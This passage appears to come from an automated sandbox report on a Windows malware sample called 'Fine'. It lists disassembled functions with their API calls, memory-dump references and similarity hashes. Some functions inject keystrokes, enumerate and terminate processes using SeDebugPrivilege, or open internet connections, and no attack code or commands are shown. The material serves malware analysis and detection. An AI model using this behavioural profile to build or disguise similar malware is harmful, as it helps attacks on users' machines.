                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A1129BA7A430BFBFA246620EC0BDA737ED8F25728F200012FA05F40D1FBA168244514
                                                                                                                                                                                                                                                                                                                            Function 001D7567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 001D758D
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 001D75CE
                                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 001D75F6
                                                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 001D773A
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 001D775B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3b18ad6a89d70349051d1a17bb43a8f5ea43edf12d79abd8d8109d061d798c30
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0a6827790c6db7971a663cde19b19c313dd08e321be491f9c846d674c37addf3
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b18ad6a89d70349051d1a17bb43a8f5ea43edf12d79abd8d8109d061d798c30
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34C17B3991465AEFDB10CFA8C544BEDB7F1FF18310F14841AE8A9A7390E734A991DB60
                                                                                                                                                                                                                                                                                                                            Function 0020D210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 997c1a6edd34552f7ec3da913549b492b525fee52c85c573a26866488603d565
                                                                                                                                                                                                                                                                                                                            • Instruction ID: ef2e9f2b5bab96659ab43b6c87f05dddb5f1cfe0c9ddfbb7781c3564b8988a31
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 997c1a6edd34552f7ec3da913549b492b525fee52c85c573a26866488603d565
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF612871922706AFDB25AFF8D8856AE7BA49F02720F04416EFD44A72C3DA319C708B51
                                                                                                                                                                                                                                                                                                                            Function 00265B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00265C24
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00265C65
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00265C6B
                                                                                                                                                                                                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00265C6F
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002679F2: DeleteObject.GDI32(00000000), ref: 00267A1E
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00265CAB
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00265CB8
                                                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00265CEB
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00265D25
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00265D34
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6bc5180abe0b095859c7918df4c23df561bc2dcfe9a0530c9bbaf759aa961395
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 23ff49b36c608ae5f5d807d35acdc13a1cb9b76aa4b3501232d4717a8ee296c2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bc5180abe0b095859c7918df4c23df561bc2dcfe9a0530c9bbaf759aa961395
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5751C230A70A2ABFEF249F65CC49F983B65FB04754F148112FA149A2E0C7B5A9E4DF41
                                                                                                                                                                                                                                                                                                                            Function 0024CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0024CBC7
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024CBDA
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?), ref: 0024CBEE
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0024CCB7
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: GetLastError.KERNEL32 ref: 0024CD67
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: SetEvent.KERNEL32(?), ref: 0024CD7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0024CC98: InternetCloseHandle.WININET(00000000), ref: 0024CD86
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f1f110f383d1e3e50109eb3b8570b4a15debf581c96c6aa60d783ec7cebbdab5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 35f8047695fe3e12b6a2c9015ce615678e1e2bf626ca6401c6d815a246bc402d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1f110f383d1e3e50109eb3b8570b4a15debf581c96c6aa60d783ec7cebbdab5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8319E71611705AFCB699F79DD88A6ABBF8FF04704B24852EF85A82610C771D824AB60
                                                                                                                                                                                                                                                                                                                            Function 00232EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002343AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetCurrentThreadId.KERNEL32 ref: 002343B4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00232F00), ref: 002343BB
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00232F0A
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00232F28
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00232F2C
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00232F36
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00232F4E
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00232F52
                                                                                                                                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00232F5C
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00232F70
                                                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00232F74
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 56e294d22d3e1fbbced24e53220f3bb89b5ae14afb110134bc1d88b1763099c4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 01a3944157b9feb228e5c39124fca1c80eedab8ba56024dc764e54f7d5b29ffb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56e294d22d3e1fbbced24e53220f3bb89b5ae14afb110134bc1d88b1763099c4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D01D870794214BBFB106769EC8EF593F69DB4EB11F104051F318AF1E0C9E164548EA9
                                                                                                                                                                                                                                                                                                                            Function 00232150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00231D95,?,?,00000000), ref: 00232159
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00231D95,?,?,00000000), ref: 00232160
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00231D95,?,?,00000000), ref: 00232175
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00231D95,?,?,00000000), ref: 0023217D
                                                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00231D95,?,?,00000000), ref: 00232180
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00231D95,?,?,00000000), ref: 00232190
                                                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00231D95,00000000,?,00231D95,?,?,00000000), ref: 00232198
                                                                                                                                                                                                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00231D95,?,?,00000000), ref: 0023219B
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,002321C1,00000000,00000000,00000000), ref: 002321B5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5c37457963c92f036c50531dd0f7fe4d6a313ab22241425c3b4c0cf6d7dd4fa6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b11c58ad8b0328f70e805ecba617e51c9f16da94733da53f356fabd984fdd12a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c37457963c92f036c50531dd0f7fe4d6a313ab22241425c3b4c0cf6d7dd4fa6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E801BFB5740348BFE710AF65EC4DF677BACEB89711F108451FA05DB1A1C6B19814CB20
                                                                                                                                                                                                                                                                                                                            Function 0023CE7B Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0023CF99
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023CFE0
                                                                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0023D047
                                                                                                                                                                                                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0023D075
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                                            • String ID: ,**$0$<**
                                                                                                                                                                                                                                                                                                                            • API String ID: 1227352736-173712272
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cb529759fb9a4d9a2bc78bfa8f20d17067ec4a18d89b2a44af38a9bb2af7a4d6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cf84e0e372b929fd8c558975fb7d9d838eb8a3ad666787e7fb0cad61a835673f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb529759fb9a4d9a2bc78bfa8f20d17067ec4a18d89b2a44af38a9bb2af7a4d6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E5104B16343029BD719EF38E844B6BB7E8AF55B14F040A2EF991E3191DBB0CD258752
                                                                                                                                                                                                                                                                                                                            Function 0025AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0023DDAC
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0023DDBA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DD87: CloseHandle.KERNEL32(00000000), ref: 0023DE87
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0025ABCA
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0025ABDD
                                                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0025AC10
                                                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0025ACC5
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0025ACD0
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025AD21
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                                                                                                                                                                                                            • Opcode ID: f14b536f017dd098f88fabe4ba5822a59e94cc08bb8f750edaf8e07648e76063
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 924836b8bfa909a311c8d82b7e5dfca28fd248d60884fa4fb026834c4742ebaa
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f14b536f017dd098f88fabe4ba5822a59e94cc08bb8f750edaf8e07648e76063
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0761F2702142429FD310DF15C48AF26BBE0AF5430AF18858DE8664FBA3C7B1EC59CB92
                                                                                                                                                                                                                                                                                                                            Function 00264322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002643C1
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 002643D6
                                                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002643F0
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00264435
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00264462
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00264490
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: SysListView32
                                                                                                                                                                                                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2a45afdbfbd37e0af8c0308fd2f015f42e3b6abae4411440a41b87871bf9fef9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 768a31b962439e5c4f69f7404ac6c83fbb8348185895a6e337edf7148fa272ca
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a45afdbfbd37e0af8c0308fd2f015f42e3b6abae4411440a41b87871bf9fef9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF41C271A10309ABDF21AF64CC49FEA7BA9FF08350F200166F954E7291D7B599A0CB90
                                                                                                                                                                                                                                                                                                                            Function 0023C625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0023C6C4
                                                                                                                                                                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 0023C6E4
                                                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0023C71A
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00BA5E90), ref: 0023C76B
                                                                                                                                                                                                                                                                                                                            • InsertMenuItemW.USER32(00BA5E90,?,00000001,00000030), ref: 0023C793
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
